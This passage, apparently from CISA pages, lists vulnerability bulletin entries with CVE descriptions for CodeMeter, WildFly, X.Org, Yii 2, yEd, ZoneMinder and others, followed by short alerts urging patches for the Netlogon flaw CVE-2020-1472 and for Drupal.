    Protocol encryption can be easily broken for CodeMeter (All versions prior to 6.90 are affected, including Version 6.90 or newer only if CodeMeter Runtime is running as server) and the server accepts external connections, which may allow an attacker to remotely communicate with the CodeMeter API. 2020-09-16 not yet calculated CVE-2020-14517
    MISC
    wibu-systems -- codemeter
     
    This vulnerability allows an attacker to use the internal WebSockets API for CodeMeter (All versions prior to 7.00 are affected, including Version 7.0 or newer with the affected WebSockets API still enabled. This is especially relevant for systems or devices where a web browser is used to access a web server) via a specifically crafted Java Script payload, which may allow alteration or creation of license files for when combined with CVE-2020-14515. 2020-09-16 not yet calculated CVE-2020-14519
    MISC
    wibu-systems -- codemeter
     
    CodeMeter (All versions prior to 6.81) and the software using it may crash while processing a specifically crafted license file due to unverified length fields. 2020-09-16 not yet calculated CVE-2020-14513
    MISC
    wibu-systems -- codemeter
     
    Multiple memory corruption vulnerabilities exist in CodeMeter (All versions prior to 7.10) where the packet parser mechanism does not verify length fields. An attacker could send specially crafted packets to exploit these vulnerabilities. 2020-09-16 not yet calculated CVE-2020-14509
    MISC
    wibu-systems -- codemeter
     
    CodeMeter (All versions prior to 6.90 when using CmActLicense update files with CmActLicense Firm Code) has an issue in the license-file signature checking mechanism, which allows attackers to build arbitrary license files, including forging a valid license file as if it were a valid license file of an existing vendor. Only CmActLicense update files with CmActLicense Firm Code are affected. 2020-09-16 not yet calculated CVE-2020-14515
    MISC
    wildfly -- wildfly
     
    A flaw was found in all supported versions before wildfly-elytron-1.6.8.Final-redhat-00001, where the WildFlySecurityManager checks were bypassed when using custom security managers, resulting in an improper authorization. This flaw leads to information exposure by unauthenticated access to secure resources. 2020-09-16 not yet calculated CVE-2020-1748
    MISC
    wildfly-- wildfly
     
    A flaw was found in Wildfly before wildfly-embedded-13.0.0.Final, where the embedded managed process API has an exposed setting of the Thread Context Classloader (TCCL). This setting is exposed as a public method, which can bypass the security manager. The highest threat from this vulnerability is to confidentiality. 2020-09-16 not yet calculated CVE-2020-10718
    MISC
    wildfly-- wildfly
     
    A flaw was found in Wildfly's implementation of Xerces, specifically in the way the XMLSchemaValidator class in the JAXP component of Wildfly enforced the "use-grammar-pool-only" feature. This flaw allows a specially-crafted XML file to manipulate the validation process in certain cases. This issue is the same flaw as CVE-2020-14621, which affected OpenJDK, and uses a similar code. All xerces jboss versions before 2.12.0.SP3. 2020-09-17 not yet calculated CVE-2020-14338
    MISC
    x.org -- x.org
     
    A flaw was found in X.Org Server before xorg-x11-server 1.20.9. An Out-Of-Bounds access in XkbSetNames function may lead to a privilege escalation vulnerability. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. 2020-09-15 not yet calculated CVE-2020-14345
    MISC
    MISC
    UBUNTU
    UBUNTU
    xmlquery -- xmlquery
     
    xmlquery before 1.3.1 lacks a check for whether a LoadURL response is in the XML format, which allows attackers to cause a denial of service (SIGSEGV) at xmlquery.(*Node).InnerText or possibly have unspecified other impact. 2020-09-16 not yet calculated CVE-2020-25614
    MISC
    MISC
    yii -- yii_2
     
    Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input. This is fixed in version 2.0.38. A possible workaround without upgrading is available in the linked advisory. 2020-09-15 not yet calculated CVE-2020-15148
    MISC
    CONFIRM
    yworks -- yed_desktop
     
    yWorks yEd Desktop before 3.20.1 allows code execution via an XSL Transformation when using an XML file in conjunction with a custom stylesheet. 2020-09-17 not yet calculated CVE-2020-25216
    MISC
    yworks -- yed_desktop
     
    yWorks yEd Desktop before 3.20.1 allows XXE attacks via an XML or GraphML document. 2020-09-17 not yet calculated CVE-2020-25215
    MISC
    zoneminder -- zoneminder
     
    ZoneMinder before 1.34.21 has XSS via the connkey parameter to download.php or export.php. 2020-09-17 not yet calculated CVE-2020-25729
    MISC
    MISC
    MISC
    Back to top

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Original release date: September 18, 2020

    The Cybersecurity and Infrastructure Security Agency (CISA) has released Emergency Directive (ED) 20-04 addressing a critical vulnerability? CVE-2020-1472?affecting Microsoft Windows Netlogon Remote Protocol. An unauthenticated attacker with network access to a domain controller could exploit this vulnerability to compromise all Active Directory identity services.

    Earlier this month, exploit code for this vulnerability was publicly released. Given the nature of the exploit and documented adversary behavior, CISA assumes active exploitation of this vulnerability is occurring in the wild.

    ED 20-04 applies to Executive Branch departments and agencies; however, CISA strongly recommends state and local governments, the private sector, and others patch this critical vulnerability as soon as possible. Review the following resources for more information:

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Original release date: September 17, 2020

    The CERT Coordination Center (CERT/CC) has released information on CVE-2020-1472, a vulnerability affecting Microsoft Windows Netlogon Remote Protocol. An unauthenticated attacker could exploit this vulnerability to obtain Active Directory domain administrator access. Although Microsoft provided patches for CVE-2020-1472 in August 2020, unpatched systems will be an attractive target for malicious actors.

    The Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review the following resources and apply the necessary updates and workaround.

    This product is provided subject to this Notification and this Privacy & Use policy.

  • Original release date: September 17, 2020

    Drupal has released security updates to address vulnerabilities in Drupal 7.x, 8.8.x, 8.9.x, and 9.0.x. An attacker could exploit some of these vulnerabilities to obtain sensitive information or leverage the way HTML is rendered.

    The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Drupal security updates and apply the necessary updates:

    This product is provided subject to this Notification and this Privacy & Use policy.